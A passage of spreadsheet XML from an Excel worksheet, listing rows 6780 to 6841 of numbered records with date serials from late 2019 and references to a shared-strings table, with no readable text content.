        <v>13378</v>
      </c>
      <c r="F6780" t="s">
        <v>9975</v>
      </c>
      <c r="G6780" t="s">
        <v>13379</v>
      </c>
    </row>
    <row r="6781" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6781">
        <f t="shared" si="105"/>
        <v>6780</v>
      </c>
      <c r="B6781">
        <v>1780</v>
      </c>
      <c r="C6781" t="s">
        <v>9973</v>
      </c>
      <c r="D6781" s="1">
        <v>43739</v>
      </c>
      <c r="E6781" t="s">
        <v>13380</v>
      </c>
      <c r="F6781" t="s">
        <v>9975</v>
      </c>
      <c r="G6781" t="s">
        <v>13381</v>
      </c>
    </row>
    <row r="6782" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6782">
        <f t="shared" si="105"/>
        <v>6781</v>
      </c>
      <c r="B6782">
        <v>1781</v>
      </c>
      <c r="C6782" t="s">
        <v>9973</v>
      </c>
      <c r="D6782" s="1">
        <v>43757</v>
      </c>
      <c r="E6782" t="s">
        <v>13382</v>
      </c>
      <c r="F6782" t="s">
        <v>9975</v>
      </c>
      <c r="G6782" t="s">
        <v>13383</v>
      </c>
    </row>
    <row r="6783" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6783">
        <f t="shared" si="105"/>
        <v>6782</v>
      </c>
      <c r="B6783">
        <v>1782</v>
      </c>
      <c r="C6783" t="s">
        <v>9973</v>
      </c>
      <c r="D6783" s="1">
        <v>43750</v>
      </c>
      <c r="E6783" t="s">
        <v>13384</v>
      </c>
      <c r="F6783" t="s">
        <v>9975</v>
      </c>
      <c r="G6783" t="s">
        <v>13385</v>
      </c>
    </row>
    <row r="6784" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6784">
        <f t="shared" si="105"/>
        <v>6783</v>
      </c>
      <c r="B6784">
        <v>1783</v>
      </c>
      <c r="C6784" t="s">
        <v>9973</v>
      </c>
      <c r="D6784" s="1">
        <v>43746</v>
      </c>
      <c r="E6784" t="s">
        <v>13386</v>
      </c>
      <c r="F6784" t="s">
        <v>9975</v>
      </c>
      <c r="G6784" t="s">
        <v>13387</v>
      </c>
    </row>
    <row r="6785" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6785">
        <f t="shared" si="105"/>
        <v>6784</v>
      </c>
      <c r="B6785">
        <v>1784</v>
      </c>
      <c r="C6785" t="s">
        <v>9973</v>
      </c>
      <c r="D6785" s="1">
        <v>43755</v>
      </c>
      <c r="E6785" t="s">
        <v>13388</v>
      </c>
      <c r="F6785" t="s">
        <v>9975</v>
      </c>
      <c r="G6785" t="s">
        <v>13389</v>
      </c>
    </row>
    <row r="6786" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6786">
        <f t="shared" si="105"/>
        <v>6785</v>
      </c>
      <c r="B6786">
        <v>1785</v>
      </c>
      <c r="C6786" t="s">
        <v>9973</v>
      </c>
      <c r="D6786" s="1">
        <v>43744</v>
      </c>
      <c r="E6786" t="s">
        <v>13390</v>
      </c>
      <c r="F6786" t="s">
        <v>9975</v>
      </c>
      <c r="G6786" t="s">
        <v>13391</v>
      </c>
    </row>
    <row r="6787" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6787">
        <f t="shared" ref="A6787:A6850" si="106">+ROW(A6786)</f>
        <v>6786</v>
      </c>
      <c r="B6787">
        <v>1786</v>
      </c>
      <c r="C6787" t="s">
        <v>9973</v>
      </c>
      <c r="D6787" s="1">
        <v>43743</v>
      </c>
      <c r="E6787" t="s">
        <v>13392</v>
      </c>
      <c r="F6787" t="s">
        <v>9975</v>
      </c>
      <c r="G6787" t="s">
        <v>13393</v>
      </c>
    </row>
    <row r="6788" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6788">
        <f t="shared" si="106"/>
        <v>6787</v>
      </c>
      <c r="B6788">
        <v>1787</v>
      </c>
      <c r="C6788" t="s">
        <v>9973</v>
      </c>
      <c r="D6788" s="1">
        <v>43746</v>
      </c>
      <c r="E6788" t="s">
        <v>13394</v>
      </c>
      <c r="F6788" t="s">
        <v>9975</v>
      </c>
      <c r="G6788" t="s">
        <v>13395</v>
      </c>
    </row>
    <row r="6789" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6789">
        <f t="shared" si="106"/>
        <v>6788</v>
      </c>
      <c r="B6789">
        <v>1788</v>
      </c>
      <c r="C6789" t="s">
        <v>9973</v>
      </c>
      <c r="D6789" s="1">
        <v>43749</v>
      </c>
      <c r="E6789" t="s">
        <v>13396</v>
      </c>
      <c r="F6789" t="s">
        <v>9975</v>
      </c>
      <c r="G6789" t="s">
        <v>13397</v>
      </c>
    </row>
    <row r="6790" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6790">
        <f t="shared" si="106"/>
        <v>6789</v>
      </c>
      <c r="B6790">
        <v>1789</v>
      </c>
      <c r="C6790" t="s">
        <v>9973</v>
      </c>
      <c r="D6790" s="1">
        <v>43746</v>
      </c>
      <c r="E6790" t="s">
        <v>13398</v>
      </c>
      <c r="F6790" t="s">
        <v>9975</v>
      </c>
      <c r="G6790" t="s">
        <v>13399</v>
      </c>
    </row>
    <row r="6791" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6791">
        <f t="shared" si="106"/>
        <v>6790</v>
      </c>
      <c r="B6791">
        <v>1790</v>
      </c>
      <c r="C6791" t="s">
        <v>9973</v>
      </c>
      <c r="D6791" s="1">
        <v>43746</v>
      </c>
      <c r="E6791" t="s">
        <v>13400</v>
      </c>
      <c r="F6791" t="s">
        <v>9975</v>
      </c>
      <c r="G6791" t="s">
        <v>13401</v>
      </c>
    </row>
    <row r="6792" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6792">
        <f t="shared" si="106"/>
        <v>6791</v>
      </c>
      <c r="B6792">
        <v>1791</v>
      </c>
      <c r="C6792" t="s">
        <v>9973</v>
      </c>
      <c r="D6792" s="1">
        <v>43753</v>
      </c>
      <c r="E6792" t="s">
        <v>13402</v>
      </c>
      <c r="F6792" t="s">
        <v>9975</v>
      </c>
      <c r="G6792" t="s">
        <v>13403</v>
      </c>
    </row>
    <row r="6793" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6793">
        <f t="shared" si="106"/>
        <v>6792</v>
      </c>
      <c r="B6793">
        <v>1792</v>
      </c>
      <c r="C6793" t="s">
        <v>9973</v>
      </c>
      <c r="D6793" s="1">
        <v>43739</v>
      </c>
      <c r="E6793" t="s">
        <v>13404</v>
      </c>
      <c r="F6793" t="s">
        <v>9975</v>
      </c>
      <c r="G6793" t="s">
        <v>13405</v>
      </c>
    </row>
    <row r="6794" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6794">
        <f t="shared" si="106"/>
        <v>6793</v>
      </c>
      <c r="B6794">
        <v>1793</v>
      </c>
      <c r="C6794" t="s">
        <v>9973</v>
      </c>
      <c r="D6794" s="1">
        <v>43747</v>
      </c>
      <c r="E6794" t="s">
        <v>13406</v>
      </c>
      <c r="F6794" t="s">
        <v>9975</v>
      </c>
      <c r="G6794" t="s">
        <v>13407</v>
      </c>
    </row>
    <row r="6795" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6795">
        <f t="shared" si="106"/>
        <v>6794</v>
      </c>
      <c r="B6795">
        <v>1794</v>
      </c>
      <c r="C6795" t="s">
        <v>9973</v>
      </c>
      <c r="D6795" s="1">
        <v>43754</v>
      </c>
      <c r="E6795" t="s">
        <v>13408</v>
      </c>
      <c r="F6795" t="s">
        <v>9975</v>
      </c>
      <c r="G6795" t="s">
        <v>13409</v>
      </c>
    </row>
    <row r="6796" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6796">
        <f t="shared" si="106"/>
        <v>6795</v>
      </c>
      <c r="B6796">
        <v>1795</v>
      </c>
      <c r="C6796" t="s">
        <v>9973</v>
      </c>
      <c r="D6796" s="1">
        <v>43753</v>
      </c>
      <c r="E6796" t="s">
        <v>13410</v>
      </c>
      <c r="F6796" t="s">
        <v>9975</v>
      </c>
      <c r="G6796" t="s">
        <v>13411</v>
      </c>
    </row>
    <row r="6797" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6797">
        <f t="shared" si="106"/>
        <v>6796</v>
      </c>
      <c r="B6797">
        <v>1796</v>
      </c>
      <c r="C6797" t="s">
        <v>9973</v>
      </c>
      <c r="D6797" s="1">
        <v>43750</v>
      </c>
      <c r="E6797" t="s">
        <v>13412</v>
      </c>
      <c r="F6797" t="s">
        <v>9975</v>
      </c>
      <c r="G6797" t="s">
        <v>13413</v>
      </c>
    </row>
    <row r="6798" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6798">
        <f t="shared" si="106"/>
        <v>6797</v>
      </c>
      <c r="B6798">
        <v>1797</v>
      </c>
      <c r="C6798" t="s">
        <v>9973</v>
      </c>
      <c r="D6798" s="1">
        <v>43754</v>
      </c>
      <c r="E6798" t="s">
        <v>10351</v>
      </c>
      <c r="F6798" t="s">
        <v>9975</v>
      </c>
      <c r="G6798" t="s">
        <v>13414</v>
      </c>
    </row>
    <row r="6799" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6799">
        <f t="shared" si="106"/>
        <v>6798</v>
      </c>
      <c r="B6799">
        <v>1798</v>
      </c>
      <c r="C6799" t="s">
        <v>9973</v>
      </c>
      <c r="D6799" s="1">
        <v>43753</v>
      </c>
      <c r="E6799" t="s">
        <v>13415</v>
      </c>
      <c r="F6799" t="s">
        <v>9975</v>
      </c>
      <c r="G6799" t="s">
        <v>13416</v>
      </c>
    </row>
    <row r="6800" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6800">
        <f t="shared" si="106"/>
        <v>6799</v>
      </c>
      <c r="B6800">
        <v>1799</v>
      </c>
      <c r="C6800" t="s">
        <v>9973</v>
      </c>
      <c r="D6800" s="1">
        <v>43739</v>
      </c>
      <c r="E6800" t="s">
        <v>13417</v>
      </c>
      <c r="F6800" t="s">
        <v>9975</v>
      </c>
      <c r="G6800" t="s">
        <v>13418</v>
      </c>
    </row>
    <row r="6801" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6801">
        <f t="shared" si="106"/>
        <v>6800</v>
      </c>
      <c r="B6801">
        <v>1800</v>
      </c>
      <c r="C6801" t="s">
        <v>9973</v>
      </c>
      <c r="D6801" s="1">
        <v>43755</v>
      </c>
      <c r="E6801" t="s">
        <v>13419</v>
      </c>
      <c r="F6801" t="s">
        <v>9975</v>
      </c>
      <c r="G6801" t="s">
        <v>13420</v>
      </c>
    </row>
    <row r="6802" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6802">
        <f t="shared" si="106"/>
        <v>6801</v>
      </c>
      <c r="B6802">
        <v>1801</v>
      </c>
      <c r="C6802" t="s">
        <v>9973</v>
      </c>
      <c r="D6802" s="1">
        <v>43749</v>
      </c>
      <c r="E6802" t="s">
        <v>12226</v>
      </c>
      <c r="F6802" t="s">
        <v>9975</v>
      </c>
      <c r="G6802" t="s">
        <v>13335</v>
      </c>
    </row>
    <row r="6803" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6803">
        <f t="shared" si="106"/>
        <v>6802</v>
      </c>
      <c r="B6803">
        <v>1802</v>
      </c>
      <c r="C6803" t="s">
        <v>9973</v>
      </c>
      <c r="D6803" s="1">
        <v>43740</v>
      </c>
      <c r="E6803" t="s">
        <v>13421</v>
      </c>
      <c r="F6803" t="s">
        <v>9975</v>
      </c>
      <c r="G6803" t="s">
        <v>13422</v>
      </c>
    </row>
    <row r="6804" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6804">
        <f t="shared" si="106"/>
        <v>6803</v>
      </c>
      <c r="B6804">
        <v>1803</v>
      </c>
      <c r="C6804" t="s">
        <v>9973</v>
      </c>
      <c r="D6804" s="1">
        <v>43739</v>
      </c>
      <c r="E6804" t="s">
        <v>13423</v>
      </c>
      <c r="F6804" t="s">
        <v>9975</v>
      </c>
      <c r="G6804" t="s">
        <v>13424</v>
      </c>
    </row>
    <row r="6805" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6805">
        <f t="shared" si="106"/>
        <v>6804</v>
      </c>
      <c r="B6805">
        <v>1804</v>
      </c>
      <c r="C6805" t="s">
        <v>9973</v>
      </c>
      <c r="D6805" s="1">
        <v>43751</v>
      </c>
      <c r="E6805" t="s">
        <v>13425</v>
      </c>
      <c r="F6805" t="s">
        <v>9975</v>
      </c>
      <c r="G6805" t="s">
        <v>13426</v>
      </c>
    </row>
    <row r="6806" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6806">
        <f t="shared" si="106"/>
        <v>6805</v>
      </c>
      <c r="B6806">
        <v>1805</v>
      </c>
      <c r="C6806" t="s">
        <v>9973</v>
      </c>
      <c r="D6806" s="1">
        <v>43753</v>
      </c>
      <c r="E6806" t="s">
        <v>13427</v>
      </c>
      <c r="F6806" t="s">
        <v>9975</v>
      </c>
      <c r="G6806" t="s">
        <v>13428</v>
      </c>
    </row>
    <row r="6807" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6807">
        <f t="shared" si="106"/>
        <v>6806</v>
      </c>
      <c r="B6807">
        <v>1806</v>
      </c>
      <c r="C6807" t="s">
        <v>9973</v>
      </c>
      <c r="D6807" s="1">
        <v>43742</v>
      </c>
      <c r="E6807" t="s">
        <v>13429</v>
      </c>
      <c r="F6807" t="s">
        <v>9975</v>
      </c>
      <c r="G6807" t="s">
        <v>13430</v>
      </c>
    </row>
    <row r="6808" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6808">
        <f t="shared" si="106"/>
        <v>6807</v>
      </c>
      <c r="B6808">
        <v>1807</v>
      </c>
      <c r="C6808" t="s">
        <v>9973</v>
      </c>
      <c r="D6808" s="1">
        <v>43747</v>
      </c>
      <c r="E6808" t="s">
        <v>13431</v>
      </c>
      <c r="F6808" t="s">
        <v>9975</v>
      </c>
      <c r="G6808" t="s">
        <v>13432</v>
      </c>
    </row>
    <row r="6809" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6809">
        <f t="shared" si="106"/>
        <v>6808</v>
      </c>
      <c r="B6809">
        <v>1808</v>
      </c>
      <c r="C6809" t="s">
        <v>9973</v>
      </c>
      <c r="D6809" s="1">
        <v>43749</v>
      </c>
      <c r="E6809" t="s">
        <v>10099</v>
      </c>
      <c r="F6809" t="s">
        <v>9975</v>
      </c>
      <c r="G6809" t="s">
        <v>13433</v>
      </c>
    </row>
    <row r="6810" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6810">
        <f t="shared" si="106"/>
        <v>6809</v>
      </c>
      <c r="B6810">
        <v>1809</v>
      </c>
      <c r="C6810" t="s">
        <v>9973</v>
      </c>
      <c r="D6810" s="1">
        <v>43755</v>
      </c>
      <c r="E6810" t="s">
        <v>13434</v>
      </c>
      <c r="F6810" t="s">
        <v>9975</v>
      </c>
      <c r="G6810" t="s">
        <v>13435</v>
      </c>
    </row>
    <row r="6811" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6811">
        <f t="shared" si="106"/>
        <v>6810</v>
      </c>
      <c r="B6811">
        <v>1810</v>
      </c>
      <c r="C6811" t="s">
        <v>9973</v>
      </c>
      <c r="D6811" s="1">
        <v>43756</v>
      </c>
      <c r="E6811" t="s">
        <v>13436</v>
      </c>
      <c r="F6811" t="s">
        <v>9975</v>
      </c>
      <c r="G6811" t="s">
        <v>13437</v>
      </c>
    </row>
    <row r="6812" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6812">
        <f t="shared" si="106"/>
        <v>6811</v>
      </c>
      <c r="B6812">
        <v>1811</v>
      </c>
      <c r="C6812" t="s">
        <v>9973</v>
      </c>
      <c r="D6812" s="1">
        <v>43751</v>
      </c>
      <c r="E6812" t="s">
        <v>10099</v>
      </c>
      <c r="F6812" t="s">
        <v>9975</v>
      </c>
      <c r="G6812" t="s">
        <v>13438</v>
      </c>
    </row>
    <row r="6813" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6813">
        <f t="shared" si="106"/>
        <v>6812</v>
      </c>
      <c r="B6813">
        <v>1812</v>
      </c>
      <c r="C6813" t="s">
        <v>9973</v>
      </c>
      <c r="D6813" s="1">
        <v>43745</v>
      </c>
      <c r="E6813" t="s">
        <v>13439</v>
      </c>
      <c r="F6813" t="s">
        <v>9975</v>
      </c>
      <c r="G6813" t="s">
        <v>13440</v>
      </c>
    </row>
    <row r="6814" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6814">
        <f t="shared" si="106"/>
        <v>6813</v>
      </c>
      <c r="B6814">
        <v>1813</v>
      </c>
      <c r="C6814" t="s">
        <v>9973</v>
      </c>
      <c r="D6814" s="1">
        <v>43749</v>
      </c>
      <c r="E6814" t="s">
        <v>10099</v>
      </c>
      <c r="F6814" t="s">
        <v>9975</v>
      </c>
      <c r="G6814" t="s">
        <v>13441</v>
      </c>
    </row>
    <row r="6815" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6815">
        <f t="shared" si="106"/>
        <v>6814</v>
      </c>
      <c r="B6815">
        <v>1814</v>
      </c>
      <c r="C6815" t="s">
        <v>9973</v>
      </c>
      <c r="D6815" s="1">
        <v>43751</v>
      </c>
      <c r="E6815" t="s">
        <v>13442</v>
      </c>
      <c r="F6815" t="s">
        <v>9975</v>
      </c>
      <c r="G6815" t="s">
        <v>13443</v>
      </c>
    </row>
    <row r="6816" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6816">
        <f t="shared" si="106"/>
        <v>6815</v>
      </c>
      <c r="B6816">
        <v>1815</v>
      </c>
      <c r="C6816" t="s">
        <v>9973</v>
      </c>
      <c r="D6816" s="1">
        <v>43749</v>
      </c>
      <c r="E6816" t="s">
        <v>13444</v>
      </c>
      <c r="F6816" t="s">
        <v>9975</v>
      </c>
      <c r="G6816" t="s">
        <v>13445</v>
      </c>
    </row>
    <row r="6817" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6817">
        <f t="shared" si="106"/>
        <v>6816</v>
      </c>
      <c r="B6817">
        <v>1816</v>
      </c>
      <c r="C6817" t="s">
        <v>9973</v>
      </c>
      <c r="D6817" s="1">
        <v>43750</v>
      </c>
      <c r="E6817" t="s">
        <v>13446</v>
      </c>
      <c r="F6817" t="s">
        <v>9975</v>
      </c>
      <c r="G6817" t="s">
        <v>13447</v>
      </c>
    </row>
    <row r="6818" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6818">
        <f t="shared" si="106"/>
        <v>6817</v>
      </c>
      <c r="B6818">
        <v>1817</v>
      </c>
      <c r="C6818" t="s">
        <v>9973</v>
      </c>
      <c r="D6818" s="1">
        <v>43754</v>
      </c>
      <c r="E6818" t="s">
        <v>13448</v>
      </c>
      <c r="F6818" t="s">
        <v>9975</v>
      </c>
      <c r="G6818" t="s">
        <v>13449</v>
      </c>
    </row>
    <row r="6819" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6819">
        <f t="shared" si="106"/>
        <v>6818</v>
      </c>
      <c r="B6819">
        <v>1818</v>
      </c>
      <c r="C6819" t="s">
        <v>9973</v>
      </c>
      <c r="D6819" s="1">
        <v>43752</v>
      </c>
      <c r="E6819" t="s">
        <v>13450</v>
      </c>
      <c r="F6819" t="s">
        <v>9975</v>
      </c>
      <c r="G6819" t="s">
        <v>13451</v>
      </c>
    </row>
    <row r="6820" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6820">
        <f t="shared" si="106"/>
        <v>6819</v>
      </c>
      <c r="B6820">
        <v>1819</v>
      </c>
      <c r="C6820" t="s">
        <v>9973</v>
      </c>
      <c r="D6820" s="1">
        <v>43757</v>
      </c>
      <c r="E6820" t="s">
        <v>13452</v>
      </c>
      <c r="F6820" t="s">
        <v>9975</v>
      </c>
      <c r="G6820" t="s">
        <v>13453</v>
      </c>
    </row>
    <row r="6821" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6821">
        <f t="shared" si="106"/>
        <v>6820</v>
      </c>
      <c r="B6821">
        <v>1820</v>
      </c>
      <c r="C6821" t="s">
        <v>9973</v>
      </c>
      <c r="D6821" s="1">
        <v>43740</v>
      </c>
      <c r="E6821" t="s">
        <v>13454</v>
      </c>
      <c r="F6821" t="s">
        <v>9975</v>
      </c>
      <c r="G6821" t="s">
        <v>13455</v>
      </c>
    </row>
    <row r="6822" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6822">
        <f t="shared" si="106"/>
        <v>6821</v>
      </c>
      <c r="B6822">
        <v>1821</v>
      </c>
      <c r="C6822" t="s">
        <v>9973</v>
      </c>
      <c r="D6822" s="1">
        <v>43738</v>
      </c>
      <c r="E6822" t="s">
        <v>13456</v>
      </c>
      <c r="F6822" t="s">
        <v>9975</v>
      </c>
      <c r="G6822" t="s">
        <v>13457</v>
      </c>
    </row>
    <row r="6823" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6823">
        <f t="shared" si="106"/>
        <v>6822</v>
      </c>
      <c r="B6823">
        <v>1822</v>
      </c>
      <c r="C6823" t="s">
        <v>9973</v>
      </c>
      <c r="D6823" s="1">
        <v>43756</v>
      </c>
      <c r="E6823" t="s">
        <v>13458</v>
      </c>
      <c r="F6823" t="s">
        <v>9975</v>
      </c>
      <c r="G6823" t="s">
        <v>13459</v>
      </c>
    </row>
    <row r="6824" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6824">
        <f t="shared" si="106"/>
        <v>6823</v>
      </c>
      <c r="B6824">
        <v>1823</v>
      </c>
      <c r="C6824" t="s">
        <v>9973</v>
      </c>
      <c r="D6824" s="1">
        <v>43754</v>
      </c>
      <c r="E6824">
        <v>7.2057294629396496E+16</v>
      </c>
      <c r="F6824" t="s">
        <v>9975</v>
      </c>
      <c r="G6824" t="s">
        <v>13460</v>
      </c>
    </row>
    <row r="6825" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6825">
        <f t="shared" si="106"/>
        <v>6824</v>
      </c>
      <c r="B6825">
        <v>1824</v>
      </c>
      <c r="C6825" t="s">
        <v>9973</v>
      </c>
      <c r="D6825" s="1">
        <v>43741</v>
      </c>
      <c r="E6825" t="s">
        <v>13461</v>
      </c>
      <c r="F6825" t="s">
        <v>9975</v>
      </c>
      <c r="G6825" t="s">
        <v>13462</v>
      </c>
    </row>
    <row r="6826" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6826">
        <f t="shared" si="106"/>
        <v>6825</v>
      </c>
      <c r="B6826">
        <v>1825</v>
      </c>
      <c r="C6826" t="s">
        <v>9973</v>
      </c>
      <c r="D6826" s="1">
        <v>43747</v>
      </c>
      <c r="E6826" t="s">
        <v>13463</v>
      </c>
      <c r="F6826" t="s">
        <v>9975</v>
      </c>
      <c r="G6826" t="s">
        <v>13464</v>
      </c>
    </row>
    <row r="6827" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6827">
        <f t="shared" si="106"/>
        <v>6826</v>
      </c>
      <c r="B6827">
        <v>1826</v>
      </c>
      <c r="C6827" t="s">
        <v>9973</v>
      </c>
      <c r="D6827" s="1">
        <v>43742</v>
      </c>
      <c r="E6827" t="s">
        <v>13465</v>
      </c>
      <c r="F6827" t="s">
        <v>10021</v>
      </c>
      <c r="G6827" t="s">
        <v>13466</v>
      </c>
    </row>
    <row r="6828" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6828">
        <f t="shared" si="106"/>
        <v>6827</v>
      </c>
      <c r="B6828">
        <v>1827</v>
      </c>
      <c r="C6828" t="s">
        <v>9973</v>
      </c>
      <c r="D6828" s="1">
        <v>43746</v>
      </c>
      <c r="E6828" t="s">
        <v>13467</v>
      </c>
      <c r="F6828" t="s">
        <v>9975</v>
      </c>
      <c r="G6828" t="s">
        <v>13468</v>
      </c>
    </row>
    <row r="6829" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6829">
        <f t="shared" si="106"/>
        <v>6828</v>
      </c>
      <c r="B6829">
        <v>1828</v>
      </c>
      <c r="C6829" t="s">
        <v>9973</v>
      </c>
      <c r="D6829" s="1">
        <v>43743</v>
      </c>
      <c r="E6829" t="s">
        <v>13469</v>
      </c>
      <c r="F6829" t="s">
        <v>9975</v>
      </c>
      <c r="G6829" t="s">
        <v>13470</v>
      </c>
    </row>
    <row r="6830" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6830">
        <f t="shared" si="106"/>
        <v>6829</v>
      </c>
      <c r="B6830">
        <v>1829</v>
      </c>
      <c r="C6830" t="s">
        <v>9973</v>
      </c>
      <c r="D6830" s="1">
        <v>43745</v>
      </c>
      <c r="E6830" t="s">
        <v>13471</v>
      </c>
      <c r="F6830" t="s">
        <v>9975</v>
      </c>
      <c r="G6830" t="s">
        <v>13472</v>
      </c>
    </row>
    <row r="6831" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6831">
        <f t="shared" si="106"/>
        <v>6830</v>
      </c>
      <c r="B6831">
        <v>1830</v>
      </c>
      <c r="C6831" t="s">
        <v>9973</v>
      </c>
      <c r="D6831" s="1">
        <v>43746</v>
      </c>
      <c r="E6831" t="s">
        <v>13473</v>
      </c>
      <c r="F6831" t="s">
        <v>9975</v>
      </c>
      <c r="G6831" t="s">
        <v>13474</v>
      </c>
    </row>
    <row r="6832" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6832">
        <f t="shared" si="106"/>
        <v>6831</v>
      </c>
      <c r="B6832">
        <v>1831</v>
      </c>
      <c r="C6832" t="s">
        <v>9973</v>
      </c>
      <c r="D6832" s="1">
        <v>43739</v>
      </c>
      <c r="E6832" t="s">
        <v>10099</v>
      </c>
      <c r="F6832" t="s">
        <v>9975</v>
      </c>
      <c r="G6832" t="s">
        <v>13475</v>
      </c>
    </row>
    <row r="6833" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6833">
        <f t="shared" si="106"/>
        <v>6832</v>
      </c>
      <c r="B6833">
        <v>1832</v>
      </c>
      <c r="C6833" t="s">
        <v>9973</v>
      </c>
      <c r="D6833" s="1">
        <v>43751</v>
      </c>
      <c r="E6833" t="s">
        <v>13476</v>
      </c>
      <c r="F6833" t="s">
        <v>9975</v>
      </c>
      <c r="G6833" t="s">
        <v>13477</v>
      </c>
    </row>
    <row r="6834" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6834">
        <f t="shared" si="106"/>
        <v>6833</v>
      </c>
      <c r="B6834">
        <v>1833</v>
      </c>
      <c r="C6834" t="s">
        <v>9973</v>
      </c>
      <c r="D6834" s="1">
        <v>43748</v>
      </c>
      <c r="E6834" t="s">
        <v>13478</v>
      </c>
      <c r="F6834" t="s">
        <v>9975</v>
      </c>
      <c r="G6834" t="s">
        <v>13479</v>
      </c>
    </row>
    <row r="6835" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6835">
        <f t="shared" si="106"/>
        <v>6834</v>
      </c>
      <c r="B6835">
        <v>1834</v>
      </c>
      <c r="C6835" t="s">
        <v>9973</v>
      </c>
      <c r="D6835" s="1">
        <v>43752</v>
      </c>
      <c r="E6835" t="s">
        <v>13480</v>
      </c>
      <c r="F6835" t="s">
        <v>9975</v>
      </c>
      <c r="G6835" t="s">
        <v>13481</v>
      </c>
    </row>
    <row r="6836" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6836">
        <f t="shared" si="106"/>
        <v>6835</v>
      </c>
      <c r="B6836">
        <v>1835</v>
      </c>
      <c r="C6836" t="s">
        <v>9973</v>
      </c>
      <c r="D6836" s="1">
        <v>43757</v>
      </c>
      <c r="E6836" t="s">
        <v>13482</v>
      </c>
      <c r="F6836" t="s">
        <v>9975</v>
      </c>
      <c r="G6836" t="s">
        <v>13483</v>
      </c>
    </row>
    <row r="6837" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6837">
        <f t="shared" si="106"/>
        <v>6836</v>
      </c>
      <c r="B6837">
        <v>1836</v>
      </c>
      <c r="C6837" t="s">
        <v>9973</v>
      </c>
      <c r="D6837" s="1">
        <v>43756</v>
      </c>
      <c r="E6837" t="s">
        <v>13484</v>
      </c>
      <c r="F6837" t="s">
        <v>9975</v>
      </c>
      <c r="G6837" t="s">
        <v>13485</v>
      </c>
    </row>
    <row r="6838" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6838">
        <f t="shared" si="106"/>
        <v>6837</v>
      </c>
      <c r="B6838">
        <v>1837</v>
      </c>
      <c r="C6838" t="s">
        <v>9973</v>
      </c>
      <c r="D6838" s="1">
        <v>43748</v>
      </c>
      <c r="E6838" t="s">
        <v>10018</v>
      </c>
      <c r="F6838" t="s">
        <v>9975</v>
      </c>
      <c r="G6838" t="s">
        <v>13486</v>
      </c>
    </row>
    <row r="6839" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6839">
        <f t="shared" si="106"/>
        <v>6838</v>
      </c>
      <c r="B6839">
        <v>1838</v>
      </c>
      <c r="C6839" t="s">
        <v>9973</v>
      </c>
      <c r="D6839" s="1">
        <v>43739</v>
      </c>
      <c r="E6839" t="s">
        <v>10099</v>
      </c>
      <c r="F6839" t="s">
        <v>9975</v>
      </c>
      <c r="G6839" t="s">
        <v>13487</v>
      </c>
    </row>
    <row r="6840" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6840">
        <f t="shared" si="106"/>
        <v>6839</v>
      </c>
      <c r="B6840">
        <v>1839</v>
      </c>
      <c r="C6840" t="s">
        <v>9973</v>
      </c>
      <c r="D6840" s="1">
        <v>43741</v>
      </c>
      <c r="E6840" t="s">
        <v>10099</v>
      </c>
      <c r="F6840" t="s">
        <v>9975</v>
      </c>
      <c r="G6840" t="s">
        <v>13488</v>
      </c>
    </row>
    <row r="6841" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6841">
        <f t="shared" si="106"/>
        <v>6840</v>
      </c>
      <c r="B6841">
        <v>1840</v>
      </c>
      <c r="C6841" t="s">
        <v>9973</v>
      </c>
